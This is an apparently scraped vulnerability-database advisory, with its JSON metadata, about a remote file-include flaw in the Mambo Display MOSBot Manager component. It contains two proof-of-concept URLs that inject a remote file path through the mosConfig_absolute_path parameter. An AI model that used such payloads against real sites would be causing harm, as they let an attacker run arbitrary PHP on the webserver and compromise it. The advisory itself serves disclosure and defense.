Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include Vulnerability
2014-07-01T00:00:00
ID SSV:81980 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/19621/info
The Mambo Display MOSBot Manager component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell http://www.example.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell
{"lastseen": "2017-11-19T14:18:48", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T14:18:48"}, "dependencies": {"references": [], "modified": "2017-11-19T14:18:48"}, "vulnersScore": 0.2}, "href": "https://www.seebug.org/vuldb/ssvid-81980", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:81980", "title": "Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n source: http://www.securityfocus.com/bid/19621/info\r\n\r\nThe Mambo Display MOSBot Manager component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.\r\n\r\nhttp://www.example.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell http://www.example.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-81980", "type": "seebug", "objectVersion": "1.4"}